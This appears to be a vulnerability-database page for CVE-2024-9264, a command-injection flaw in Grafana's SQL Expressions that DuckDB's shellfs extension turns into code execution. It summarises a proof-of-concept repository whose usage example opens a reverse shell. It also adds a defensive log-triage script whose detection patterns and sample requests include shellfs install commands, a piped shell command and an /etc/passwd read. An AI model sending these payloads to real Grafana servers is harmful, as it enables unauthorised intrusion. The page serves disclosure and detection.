Grafana SQL Expressions Remote Code Execution Vulnerability

Vulnerability information

Vulnerability name: Grafana SQL Expressions remote code execution vulnerability

Vulnerability ID:

  • CVE: CVE-2024-9264

Vulnerability type: command execution (command injection through DuckDB; the linked zekosec write-up covers the local file read variant of the same flaw)

Severity: Critical

Description: Grafana is an open-source metrics analytics and visualization platform that is widely used for monitoring and observability. It supports many data sources, including time-series databases such as Prometheus and InfluxDB, and is commonly deployed in enterprise environments to monitor system performance and health in real time. Its flexibility and feature set have made it one of the most widely deployed monitoring front ends worldwide.

The vulnerability lies in Grafana's SQL Expressions feature. The SQL text of an expression query is passed, with insufficient validation, to a DuckDB process, so an attacker who can submit expression queries controls what DuckDB executes. Because the user-supplied SQL is not sanitized, a crafted expression can go beyond querying the in-memory result set: in particular, it can install and load the shellfs DuckDB community extension, which lets a query read from or write to a shell command, turning the SQL injection into arbitrary command execution on the Grafana host.

The impact is severe, since an attacker can run arbitrary commands on the affected server and from there exfiltrate data, disrupt service, or pivot further. Exploitation does require valid credentials for an authenticated Grafana user with at least the Viewer role, so there is a precondition, but once that precondition is met the attacker obtains remote code execution with no further authentication step. Two practical caveats for triage: the attack only works if a duckdb binary is present on Grafana's PATH, and Grafana distributions do not ship that binary by default, so a deployment is exploitable only where an administrator has installed DuckDB alongside Grafana; and the Viewer role is the lowest privilege level, so any account, including shared read-only dashboard accounts, is sufficient. Every organization running an affected Grafana version should apply the security release promptly and, in the meantime, confirm whether duckdb is reachable from the Grafana process.
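An added triage example, written for this page and not taken from the PoC repository or from Grafana itself: it scans captured /api/ds/query request bodies and flags SQL expression queries that try to reach shellfs, and separately those that point a DuckDB file reader at an absolute local path. The request shape assumed here (an expression datasource with uid `__expr__`, query `type` `sql`, SQL text in `expression`) and the shellfs conventions assumed (INSTALL/LOAD shellfs, a trailing `|` in a read path, a leading `|` in a write path) are stated as assumptions in the code; the sample log lines are constructed.

```python
"""Triage helper for CVE-2024-9264: flag Grafana /api/ds/query requests whose SQL
expressions try to reach DuckDB's shellfs extension or read local files.

Added example, not code from this page, the PoC repository, or Grafana.
Assumptions (not taken from the page): the request body shape (a query with
datasource uid "__expr__", "type": "sql" and the SQL text in "expression") and
the shellfs conventions (INSTALL/LOAD shellfs, a trailing '|' in a read path to
run a command, a leading '|' in a write path to pipe output into one)."""
import json
import re

# Ways an expression can reach shell execution through shellfs (assumed conventions).
SHELL_PATTERNS = [
    re.compile(r"\b(?:INSTALL|LOAD)\s+shellfs\b", re.I),  # pull in / activate the extension
    re.compile(r"'[^']*\|\s*'"),                          # read path ending in '|': run a command
    re.compile(r"'\s*\|[^']*'"),                          # write path starting with '|': pipe into one
]
# Plain DuckDB file readers pointed at an absolute path: the local-file-read variant.
FILE_PATTERN = re.compile(r"\bread_(?:csv|text|blob|json|parquet)\s*\(\s*'/", re.I)


def sql_expressions(body):
    """Yield (refId, expression) for each SQL-type expression query in one
    /api/ds/query body. Non-JSON bodies and ordinary datasource queries yield nothing."""
    try:
        doc = json.loads(body)
    except ValueError:
        return
    if not isinstance(doc, dict):
        return
    for q in doc.get("queries", []):
        if not isinstance(q, dict):
            continue
        ds = q.get("datasource") or {}
        if ds.get("uid") == "__expr__" and q.get("type") == "sql":
            yield q.get("refId", "?"), q.get("expression", "")


def classify(expression):
    """'shell' if the SQL tries to reach shellfs, 'file' if it reads a local path,
    otherwise 'sql' (still worth noting: an SQL expression in /api/ds/query is unusual
    unless the experimental feature is deliberately in use)."""
    if any(p.search(expression) for p in SHELL_PATTERNS):
        return "shell"
    if FILE_PATTERN.search(expression):
        return "file"
    return "sql"


def triage(lines):
    """Return (line index, refId, verdict) for every SQL expression found in the lines."""
    findings = []
    for i, line in enumerate(lines):
        for ref_id, expr in sql_expressions(line):
            findings.append((i, ref_id, classify(expr)))
    return findings


# Constructed request bodies standing in for captured /api/ds/query traffic.
EXPR_DS = {"uid": "__expr__", "type": "__expr__"}
SAMPLE_LOG = [
    json.dumps({"queries": [{"refId": "A", "datasource": EXPR_DS, "type": "sql",
                             "expression": "SELECT refId, value FROM A WHERE value > 0"}]}),
    json.dumps({"queries": [{"refId": "B", "datasource": EXPR_DS, "type": "sql",
                             "expression": "INSTALL shellfs FROM community; LOAD shellfs; "
                                           "SELECT * FROM read_csv('id |')"}]}),
    json.dumps({"queries": [{"refId": "C", "datasource": EXPR_DS, "type": "sql",
                             "expression": "SELECT * FROM read_text('/etc/passwd')"}]}),
    json.dumps({"queries": [{"refId": "D", "datasource": {"uid": "prom-1", "type": "prometheus"},
                             "expr": "up"}]}),
    "GET /api/health 200",
]

if __name__ == "__main__":
    for idx, ref_id, verdict in triage(SAMPLE_LOG):
        print(f"line {idx}: refId={ref_id} verdict={verdict}")
```

Run it against request bodies recovered from a reverse proxy or Grafana's own request logging; a "shell" verdict from a Viewer account is a strong indicator of exploitation, while a bare "sql" verdict on an instance that never enabled SQL Expressions is still worth a look.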

Vendor: Grafana

Product: Grafana

Affected versions: >= v11.0.0 (all v11.x.y releases are impacted)

Source: https://github.com/Royall-Researchers/CVE-2024-9264

Type: CVE-2024: GitHub search

Repository files

  • README.md
  • poc.py

Source overview

CVE-2024-9264: RCE exploit in Grafana via SQL Expressions

Description

Proof Of Concept for Remote Code Execution in Grafana (CVE-2024-9264)

This repository contains a Python script that exploits a Remote Code Execution (RCE) vulnerability in Grafana's SQL Expressions feature.
Because the SQL text of an expression query is handed to DuckDB with insufficient input sanitization, the exploit can execute arbitrary shell commands on the server.
This is made possible through the shellfs community extension for DuckDB, which the attacker installs and loads from within the injected SQL to turn queries into command execution.

Prerequisites

  • authenticated Grafana user with Viewer permissions or higher
  • a DuckDB binary installed and reachable through Grafana's PATH (Grafana distributions do not bundle one by default)

Impacted version

Grafana >= v11.0.0 (all v11.x.y releases are impacted)

Usage

python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

Example

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

Disclaimer

This script is intended for educational purposes and for use in controlled environments where you have permission to test the security of the system. Misuse of this tool could lead to legal consequences.

More

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/


http://example.com/2025/07/05/github_132909169/
Author: lianccc
Published: 5 July 2025